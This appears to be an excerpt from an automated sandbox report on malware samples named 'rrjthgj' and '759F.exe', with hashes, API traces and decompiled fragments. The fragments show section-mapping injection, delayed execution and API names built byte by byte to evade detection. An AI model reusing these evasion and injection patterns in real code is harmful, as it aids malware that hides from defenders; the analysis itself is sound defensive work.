Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 8BF09631600719ABE7203BF9AC8CBAE77E8AF59634F100569E743D20C0DB71E9458A61

Uniqueness

Uniqueness Score: -1.00%

Function 00401749 Relevance: 3.0, APIs: 2, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction ID: 088a864a315bec2a81033f27f4cad91d314b4a72151043dcf738e9c9ac7e5ebb
Opcode Fuzzy Hash: 645c41685cf09351304fde75ab205f83a01d627caff4926b51e1c70b330bbf47
Instruction Fuzzy Hash: 0E011475500288FEEB219F92CC49FAF7FB9EF82B10F08016AF510B61E5E2714980CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0065003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0065024D

Strings

cess, xrefs: 0065018D
kernel32.dll, xrefs: 0065008F, 00650095

Memory Dump Source

Source File: 00000004.00000002.449569254.0000000000650000.00000040.00001000.00020000.00000000.sdmp, Offset: 00650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_650000_rrjthgj.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 1530e91a1fff1753638a41e1c014267414ee5eaf9afa58c328c89c25afdb65d3
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 37526974A01229DFDB64CF58C985BA8BBB1BF09305F1480D9E94DAB351DB30AE89DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00650E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00650223,?,?), ref: 00650E19
SetErrorMode.KERNELBASE(00000000,?,?,00650223,?,?), ref: 00650E1E

Memory Dump Source

Source File: 00000004.00000002.449569254.0000000000650000.00000040.00001000.00020000.00000000.sdmp, Offset: 00650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_650000_rrjthgj.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 73c4fde7ee116af7b343ef3dd2a6c2e91e930ba693360d46c8ddcc642e429870
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 06D0123114512977D7002A94DC09BCD7B1CDF05B63F108411FB0DD9180C770994046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A354 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___initmbctable.LIBCMT ref: 0040A35C

Part of subcall function 0040C63D: __setmbcp.LIBCMT ref: 0040C648

Memory Dump Source

Source File: 00000004.00000002.448515011.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_rrjthgj.jbxd

Similarity

API ID: ___initmbctable__setmbcp
String ID:
API String ID: 2112888233-0
Opcode ID: 38afab757e8f1bf25f4e7a50a942883c92c5ab1aac48d1f0aa2e5f8f1f573800
Instruction ID: f1c1c2783fabe4eea28a351e9f4ac63c050765bac6a290c9e949a9cadb4d6fc4
Opcode Fuzzy Hash: 38afab757e8f1bf25f4e7a50a942883c92c5ab1aac48d1f0aa2e5f8f1f573800
Instruction Fuzzy Hash: 452108B39043105BE7311B35AD45B6737989B51339F25013FEC91B21D2DE7E8862866F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A809 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040A81E

Memory Dump Source

Source File: 00000004.00000002.448515011.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_409000_rrjthgj.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 6257122c168b14a4d9514a5d42c5e8dec63049703687e45649a60d1e1a8beb9b
Instruction ID: 9f2627d6d3eb8e56ea3badd99d2cf6ca01e9c445727d8f4301bef28060a7e072
Opcode Fuzzy Hash: 6257122c168b14a4d9514a5d42c5e8dec63049703687e45649a60d1e1a8beb9b
Instruction Fuzzy Hash: 41D05E32650304AFEB145F716C08B223BECE388395F008436B90CC6290F674C9A1D649

Uniqueness

Uniqueness Score: -1.00%

Function 00401932 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00401932(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				void* _t19;
				void* _t20;

				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, __eflags);
				_t14 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				_t10 = L00401467(_t19, _t20); // executed
				_t26 = _t10;
				if(_t10 != 0) {
					E00401558(_t14, _t10, _v8, _a16); // executed
				}
				 *_t14(0xffffffff, 0);
				_t12 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t26);
				return _t12;
			}

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction ID: f289286abcb0c8361d5bc883c0512fb430ce21eb2a0d87beead029bdd4c1ea53
Opcode Fuzzy Hash: 3fc1ef90b2a5b2730ee9b434eeb4b582bf46cdcd1d0460405fd1be13f8c58862
Instruction Fuzzy Hash: 6C11C2F1208204F7E7006A959D62E7A3669AB01714F304137BA43790F1D57D9913E76F

Uniqueness

Uniqueness Score: -1.00%

Function 0040193D Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 29%

			E0040193D(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t14;
				void* _t16;
				intOrPtr* _t18;
				void* _t30;
				signed int _t38;

				_t26 = __edi;
				asm("in eax, 0x45");
				_t2 = __eax - 0x7a;
				 *_t2 =  *(__eax - 0x7a) | __ecx;
				_t38 =  *_t2;
				_push(0x1986);
				_push(0x6d);
				_push(0xc5);
				L004011F5(__edi, _t38);
				_t18 =  *((intOrPtr*)(_t30 + 8));
				Sleep(0x1388);
				_push(_t30 - 4);
				_push( *((intOrPtr*)(_t30 + 0x10)));
				_push( *((intOrPtr*)(_t30 + 0xc)));
				_push(_t18); // executed
				_t14 = L00401467(__edi, __esi); // executed
				_t39 = _t14;
				if(_t14 != 0) {
					E00401558(_t18, _t14,  *((intOrPtr*)(_t30 - 4)),  *((intOrPtr*)(_t30 + 0x14))); // executed
				}
				 *_t18(0xffffffff, 0);
				_t16 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t26, _t39);
				return _t16;
			}

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction ID: 515f5f5985279033342f6d13e0d75d2e799464d7355665022411b06cc3c0c42c
Opcode Fuzzy Hash: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
Instruction Fuzzy Hash: 991129F2608285EBD7005BA18DA2EA937659F01710F20057BF6037E0F2D53D9513EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 01FE65BC Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 01FE660D

Memory Dump Source

Source File: 00000004.00000002.449916655.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1fe0000_rrjthgj.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: df89071df24e04f8290dc43a6a9d485b06b5086d40be46c78dc0abfb7e9f4807
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: FD112B79A00208EFDB01DF98C989E98BBF5AF18350F058094F9489B361D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0040196C Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040196C(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t9;
				void* _t11;
				intOrPtr* _t13;
				void* _t23;

				_t19 = __edi;
				_pop(es);
				asm("sbb bh, [eax+ebp*2]");
				_push(0xc5);
				L004011F5(__edi, __eflags);
				_t13 =  *((intOrPtr*)(_t23 + 8));
				Sleep(0x1388);
				_push(_t23 - 4);
				_push( *((intOrPtr*)(_t23 + 0x10)));
				_push( *((intOrPtr*)(_t23 + 0xc)));
				_push(_t13); // executed
				_t9 = L00401467(__edi, __esi); // executed
				_t29 = _t9;
				if(_t9 != 0) {
					E00401558(_t13, _t9,  *((intOrPtr*)(_t23 - 4)),  *((intOrPtr*)(_t23 + 0x14))); // executed
				}
				 *_t13(0xffffffff, 0);
				_t11 = 0x1986;
				_push(0x6d);
				_push(0xc5);
				L004011F5(_t19, _t29);
				return _t11;
			}

APIs

Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E

Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644

Memory Dump Source

Source File: 00000004.00000002.448489482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rrjthgj.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction ID: 3e47f40c2c79a3419effdd93610d16f961f2ccd470e9348de27537ec9d0296a5
Opcode Fuzzy Hash: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
Instruction Fuzzy Hash: CA01F2B2208244EFCB005BE58CA1EAA3765AB05315F300133F603B90F2C93C8512EB6B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0065092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 006509DC, 006509DF, 006509E4
., xrefs: 0065095F
l, xrefs: 00650966

Memory Dump Source

Source File: 00000004.00000002.449569254.0000000000650000.00000040.00001000.00020000.00000000.sdmp, Offset: 00650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_650000_rrjthgj.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 3c31ce469b3a87a164076fdc3066b66db75b2aa51599234bd77c6d71df655649
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 63315CB6900609DFEB10CF99C880AEDBBF6FF48325F14514AD841A7315D771EA49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01FE61DA Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.449916655.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1fe0000_rrjthgj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 1de68d57cd1f2cd5220c916fb30e4cb6780297f4e341b1ed34cb28dd8565439c
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 72118E72740104AFDB54DF59DC94FA677EAFB99330B198065ED04CB311E67AE801C760

Uniqueness

Uniqueness Score: -1.00%

Function 00650D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.449569254.0000000000650000.00000040.00001000.00020000.00000000.sdmp, Offset: 00650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_650000_rrjthgj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: dfc778a6f2b1905345e6b5076b8398e1371667b2b4530c6b18155b8700907ab7
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 2401DF72A006008FEB21CF60C805BEA33BAEF86306F1545A4D90A97281E770E8498F80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 759F.exePID: 7636, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	3%
Signature Coverage:	4.3%
Total number of Nodes:	1517
Total number of Limit Nodes:	15

Executed Functions

Function 00405380 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405380(void* __eax, void* __edx) {
				void* _t16;

				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *((intOrPtr*)(_t16 + 0x3c)) =  *((intOrPtr*)(_t16 + 0x3c)) + __edx;
			}

0x00405386
0x00405389

APIs

OpenMutexA.KERNEL32 ref: 00405395
FindResourceExA.KERNEL32(00000000,zetepecagoxidamidujim,wisamejixayex bijexorafuxihocom ruvupigezipasujucililecuyajejowi duwuleximuvi,00000000), ref: 004053A9
BeginUpdateResourceW.KERNEL32 ref: 004053B6
_calloc.LIBCMT ref: 004053C0

Part of subcall function 004077A6: __calloc_impl.LIBCMT ref: 004077BB

Strings

jejoduwituguvobewizeranace, xrefs: 0040538C
zetepecagoxidamidujim, xrefs: 004053A2
hohaxoyapokixewavurotazenaxelo, xrefs: 004053B1
wisamejixayex bijexorafuxihocom ruvupigezipasujucililecuyajejowi duwuleximuvi, xrefs: 0040539D
U/A, xrefs: 004053CD

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: Resource$BeginFindMutexOpenUpdate__calloc_impl_calloc
String ID: U/A$hohaxoyapokixewavurotazenaxelo$jejoduwituguvobewizeranace$wisamejixayex bijexorafuxihocom ruvupigezipasujucililecuyajejowi duwuleximuvi$zetepecagoxidamidujim
API String ID: 2663153079-1756814376
Opcode ID: c97d4d71b820779c69e3501b448aa700bbe63fbe05789934f797d79fcfe85b85
Instruction ID: 79f8bd660d63ee66b05d1c1705ab8c28ab8f13754004d0b59e5c7dbe634edba5
Opcode Fuzzy Hash: c97d4d71b820779c69e3501b448aa700bbe63fbe05789934f797d79fcfe85b85
Instruction Fuzzy Hash: DAF015756C0300ABE210ABA0AD0AF053F64AB28B07F204136F741B92E0C6B825449B1D

Uniqueness

Uniqueness Score: -1.00%

Function 00404E80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404E80() {
				long _v4;
				struct HINSTANCE__* _t2;
				int _t6;
				long* _t11;

				_t2 = LoadLibraryW(L"kernel32.dll");
				 *0x53c468 = _t2;
				 *0x4ba548 = 0x56;
				 *0x4ba549 = 0x69;
				 *0x4ba54a = 0x72;
				 *0x4ba54f = 0x50;
				 *0x4ba555 = 0x74;
				 *0x4ba556 = 0;
				 *0x4ba54b = 0x74;
				 *0x4ba554 = 0x63;
				 *0x4ba54c = 0x75;
				 *0x4ba54d = 0x61;
				 *0x4ba54e = 0x6c;
				 *0x4ba550 = 0x72;
				 *0x4ba551 = 0x6f;
				 *0x4ba552 = 0x74;
				 *0x4ba553 = 0x65;
				 *0x53c1e0 = GetProcAddress(_t2, 0x4ba548);
				 *_t11 = 0x20;
				 *_t11 =  *_t11 + 0x20;
				_t6 = VirtualProtect( *0x53c1f8,  *0x53c47c,  *_t11,  &_v4); // executed
				return _t6;
			}

0x00404e88
0x00404e98
0x00404e9d
0x00404ea4
0x00404eab
0x00404eb1
0x00404eb8
0x00404ebe
0x00404ec5
0x00404ecb
0x00404ed2
0x00404ed9
0x00404ee0
0x00404ee7
0x00404eed
0x00404ef4
0x00404efa
0x00404f07
0x00404f0c
0x00404f13
0x00404f2d
0x00404f36

APIs

LoadLibraryW.KERNEL32(kernel32.dll), ref: 00404E88
GetProcAddress.KERNEL32(00000000,004BA548), ref: 00404F01
VirtualProtect.KERNELBASE(?,?,?,?), ref: 00404F2D

Strings

kernel32.dll, xrefs: 00404E83

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: AddressLibraryLoadProcProtectVirtual
String ID: kernel32.dll
API String ID: 3509694964-1793498882
Opcode ID: 600a2eab0a63a252b838c0c4cbaeb72a8365a653064d7d0eb36e20cb1645a277
Instruction ID: 6d7c62cad3edb4706107e2c77a62273e4c0d7fce2501e88539b3302feb6c7132
Opcode Fuzzy Hash: 600a2eab0a63a252b838c0c4cbaeb72a8365a653064d7d0eb36e20cb1645a277
Instruction Fuzzy Hash: 7C11F7614082D0EFE321DB2CBD587563FA56726709F084269D084973A6D6BA127CDB3B

Uniqueness

Uniqueness Score: -1.00%

Function 00405381 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405381(void* __eax, void* __edx) {
				void* _t16;

				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *((intOrPtr*)(_t16 + 0x3c)) =  *((intOrPtr*)(_t16 + 0x3c)) + __edx;
			}

0x00405386
0x00405389

APIs

OpenMutexA.KERNEL32 ref: 00405395
FindResourceExA.KERNEL32(00000000,zetepecagoxidamidujim,wisamejixayex bijexorafuxihocom ruvupigezipasujucililecuyajejowi duwuleximuvi,00000000), ref: 004053A9
BeginUpdateResourceW.KERNEL32 ref: 004053B6
_calloc.LIBCMT ref: 004053C0

Part of subcall function 004077A6: __calloc_impl.LIBCMT ref: 004077BB

Part of subcall function 00404F90: GetStringTypeExA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00404FD2
Part of subcall function 00404F90: CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,yexaguvoyeh,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00404FE2
Part of subcall function 00404F90: GetPolyFillMode.GDI32(00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00404FE9
Part of subcall function 00404F90: ReportEventW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404FF8
Part of subcall function 00404F90: ReadEventLogW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405005
Part of subcall function 00404F90: SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,004B5BDB,000000FF), ref: 00405013
Part of subcall function 00404F90: _fprintf.LIBCMT ref: 0040501B
Part of subcall function 00404F90: __vswprintf.LIBCMT ref: 00405055

Strings

jejoduwituguvobewizeranace, xrefs: 0040538C
zetepecagoxidamidujim, xrefs: 004053A2
hohaxoyapokixewavurotazenaxelo, xrefs: 004053B1
wisamejixayex bijexorafuxihocom ruvupigezipasujucililecuyajejowi duwuleximuvi, xrefs: 0040539D
U/A, xrefs: 004053CD

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: EventFileResource$BeginCreateFillFindMappingModeMutexOpenPointerPolyReadReportStringTypeUpdate__calloc_impl__vswprintf_calloc_fprintf
String ID: U/A$hohaxoyapokixewavurotazenaxelo$jejoduwituguvobewizeranace$wisamejixayex bijexorafuxihocom ruvupigezipasujucililecuyajejowi duwuleximuvi$zetepecagoxidamidujim
API String ID: 1503892939-1756814376
Opcode ID: 11a967bb02b6696410d5ffb050e51d5f93eb20d186f9037b47cf1f5cb1ff79cc
Instruction ID: 56bacfe3794ed0a3ce9ef4b78a11100196f0c114059f65e93b0e8c60c1173bb3
Opcode Fuzzy Hash: 11a967bb02b6696410d5ffb050e51d5f93eb20d186f9037b47cf1f5cb1ff79cc
Instruction Fuzzy Hash: ABF01C756843407FE350AB60AD47F153F649B25B03F24413BF781F92E1D6B855448B1A

Uniqueness

Uniqueness Score: -1.00%

Function 023007A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 023007CE
Module32First.KERNEL32(00000000,00000224), ref: 023007EE

Memory Dump Source

Source File: 00000005.00000002.440951446.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2300000_759F.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 62b60cd60ea6e9d9d4a2d1c4b07801a4675a09c41fedd1e2918568054da0c529
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BAF090322017156FE7243BF9A8DCB6F76E8AF49A69F100528E643910C0DBB8F8458E71

Uniqueness

Uniqueness Score: -1.00%

Function 00410283 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00410283(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4b9f04 = _t6;
				if(_t6 != 0) {
					 *0x542c04 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00410298
0x0041029e
0x004102a5
0x004102ac
0x004102b2
0x004102a8
0x004102a8
0x004102a8

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00410298

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: a43c2633044296beeb47d1336a39967b3bf83b9d04e77adbb46fa2f246d146f7
Instruction ID: 94ba6bf8cce0e8feb03f387ff3dc49f244d36bcd8e9e4be88af4b38df778611d
Opcode Fuzzy Hash: a43c2633044296beeb47d1336a39967b3bf83b9d04e77adbb46fa2f246d146f7
Instruction Fuzzy Hash: 06D05E3AA60304AEDB105FB1BD097763BDC9388399F008436BA4CC6150F974C9809544

Uniqueness

Uniqueness Score: -1.00%

Function 00404770 Relevance: 1.5, APIs: 1, Instructions: 17
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404770() {
				struct HINSTANCE__* _t2;

				 *0x4ba551 = 0x6c;
				 *0x4ba54b = 0x6d;
				 *0x4ba54a = 0x69;
				 *0x4ba54c = 0x67;
				 *0x4ba550 = 0x64;
				 *0x4ba553 = 0;
				 *0x4ba54d = 0x33;
				 *0x4ba549 = 0x73;
				 *0x4ba552 = 0x6c;
				 *0x4ba54f = 0x2e;
				 *0x4ba54e = 0x32;
				 *0x4ba548 = 0x6d; // executed
				_t2 = LoadLibraryA(0x4ba548); // executed
				return _t2;
			}

0x00404779
0x0040477f
0x00404784
0x0040478b
0x00404792
0x00404799
0x004047a0
0x004047a7
0x004047ae
0x004047b4
0x004047bb
0x004047c2
0x004047c7
0x004047cd

APIs

LoadLibraryA.KERNELBASE(004BA548,0040535E,?,?,?,?,?,?,004B5BDB,000000FF), ref: 004047C7

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 588a7969291bafd7284a2a7db3ad013c4a42454afe158531dcc6040eaabceea6
Instruction ID: 12c16c9342cb90c0d8bfb2e49d09581061422155bfcb0070d791d3d8cbd7b843
